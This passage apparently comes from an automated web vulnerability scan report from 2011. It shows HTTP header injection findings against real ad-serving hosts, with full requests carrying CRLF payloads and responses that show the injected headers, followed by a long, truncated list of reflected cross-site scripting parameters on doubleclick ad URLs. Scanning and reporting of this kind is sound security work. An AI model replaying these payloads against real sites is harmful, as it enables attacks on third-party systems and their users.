The value of the si request parameter is copied into the Set-Cookie response header. The payload a1786%0d%0ac1d8d57dd13 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=OTH&si=a1786%0d%0ac1d8d57dd13&pi=L&xs=3&pu=http%253A//www.cbsnews.com/%253Fifu%253D&df=1&v=5.5&cb=50841 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; N=2:63136b7f5ed8fe53e6d4a6a9fc75f3cd,ff33ea61b6fcafb8c7a1e9f831635916; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=50212^1^1304141664|50280^1^1304141756|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:09 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Wed, 27 Apr 2011 23:33:09 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Sat, 21-Apr-12 23:18:09 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=50212^1^1304141664|50280^1^1304551089|50216^1^1304218502|53615^1^1304218529|50221^1^1304512529|60190^1^1304512529; path=/; expires=Wed, 04-May-11 23:18:09 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1303946289^1303948089|a1786
c1d8d57dd13^1303946289^1303948089; path=/; expires=Wed, 27-Apr-11 23:48:09 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|53575|#|50280|53615|60190; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ff33ea61b6fcafb8c7a1e9f831635916,5fe4d0c3901c5337a9498eac0b10cce3; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTMzODA6NjA0OTA6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDY6NTcwOTQ6NTExODI6NTY2NzM6NTQwNTc6NTY5Njk6NTY4MzU6NTY3ODA6NTAyMTI6NTY5ODc6NTAyMjE6NTAyMTY6NTM1NzU6NTAyODA6NTM2MTU6NjAxOTA=; expires=Sat, 21-Apr-12 23:18:09 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 242
Content-Type: application/x-javascript
Content-Length: 242

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|53380|60490|52615|60491|50507|53656|55401|60506|57094|51182|56673|54057|56969|56835|56780|50212|56987|50221|50216|
...[SNIP]...

2.13. http://widgetserver.com/syndication/get_widget.js [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgetserver.com
Path:	/syndication/get_widget.js

Issue detail

The value of the callback request parameter is copied into the Location response header. The payload bb955%0d%0af888249c06b was submitted in the callback parameter. This caused a response containing an injected HTTP header.

Request

GET /syndication/get_widget.js?callback=bb955%0d%0af888249c06b&output=json&location=http%3A%2F%2Fwww.cbs.com%2F&timestamp=1303946101118&appId.0=cc396f99-ff24-4e7b-bd0c-32d96c3767c8 HTTP/1.1
Host: widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 27 Apr 2011 23:14:55 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://cdn.widgetserver.com/syndication/json/i/cc396f99-ff24-4e7b-bd0c-32d96c3767c8/iv/5/p/3/r/e8cf8788-6b03-4c0c-8d03-44a859eb3751/rv/36/t/30b2593ec7bf2492f0b9d19e64b204a8e259fcf60000012f98d80b21/u/3/?callback=bb955
f888249c06b
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: application/x-javascript
Content-Length: 0

3. Cross-site scripting (reflected) previous
There are 865 instances of this issue:

http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [event parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [h parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [l parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [nd parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [o parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [oepartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [orh parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [p parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pdom parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pg parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pp parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ppartner parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [pt parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [ra parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [rqid parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sg parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [site parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [sz parameter]
http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [t parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [nd parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [o parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [oepartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [orh parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [p parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pdom parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pp parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ppartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [pt parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [ra parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [rqid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [site parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [sz parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [t parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [b parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [count parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [e parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [epartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [event parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [h parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [l parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [nd parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [o parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [oepartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter]
http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pp parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pt parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [rqid parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sg parameter]
http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [t parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [b parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [count parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [e parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [epartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [event parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [h parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [l parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [nd parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [o parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [oepartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [site parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sz parameter]
http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pp parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ppartner parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pt parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [ra parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [rqid parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sg parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [site parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [sz parameter]
http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [t parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [b parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [count parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [e parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [event parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [h parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [l parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [o parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [p parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [site parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5 [t parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [b parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [count parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [e parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [event parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [h parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [l parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [o parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [p parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [site parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6 [t parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [b parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [count parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [cpnmodule parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [e parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [epartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [event parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [h parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [l parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [nd parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [o parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [oepartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [orh parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [p parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pdom parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pg parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pp parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ppartner parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [pt parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [ra parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [rqid parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sg parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [site parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [sz parameter]
http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20 [t parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [b parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cid parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [count parameter]
http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8 [cpnmodule parameter]
